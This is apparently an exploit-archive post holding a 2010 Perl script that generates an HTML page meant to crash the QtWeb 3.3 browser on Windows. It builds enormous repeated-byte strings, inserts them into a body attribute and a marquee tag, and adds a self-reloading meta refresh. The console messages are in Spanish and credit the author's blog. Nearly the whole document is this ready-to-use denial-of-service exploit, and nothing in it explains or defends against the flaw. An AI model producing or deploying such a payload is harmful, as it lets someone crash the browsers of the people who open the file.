# Title:QtWeb 3.3 Remote DoS/Crash Exploit
# Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable: http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Platform:Windows
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
Exploit
----------------
#!/usr/bin/perl
# File Name :QtWeb 3.3 Remote DoS/Crash Exploit
# Vuln :Remote Dos/Crash
# Author :PoisonCode
# Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit
# Date:02/06/2010
# Author:PoisonCode
# Site :http://www.qtweb.net/
# Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
$file="Exploit QtWeb 3.3.html";
print " ======================================\n";
print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n";
print " = Autor:PoisonCode =\n";
print " = Web :PanamaSecurity.blogspot.com =\n";
print " ======================================\n";
print "\n";
print " Espere Mientras se Genera el Exploit\n";
my $a="\x55" x 100000000;
my $b="\85" x 55900000;
my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72";
open(myfile,">>$file");
print myfile "<html>";
print myfile "<title>PanamaSecurity - PoisonCode $c </title>";
print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>';
print myfile "<body alink=";
print myfile $a,$b,$c;
print myfile "<marquee>$a,$b,$c</marquee>";
print myfile '">';
print myfile "</html>";
close(myfile);
print "\n";
print " Nombre del Archivo : $file\n";
print " Se Ha Creado El Exploit Correctamente \n";
print "\n";
print "----------------------------------------------------------------------\n";
print " Visiten : PanamaSecurity.blogspot.com\n";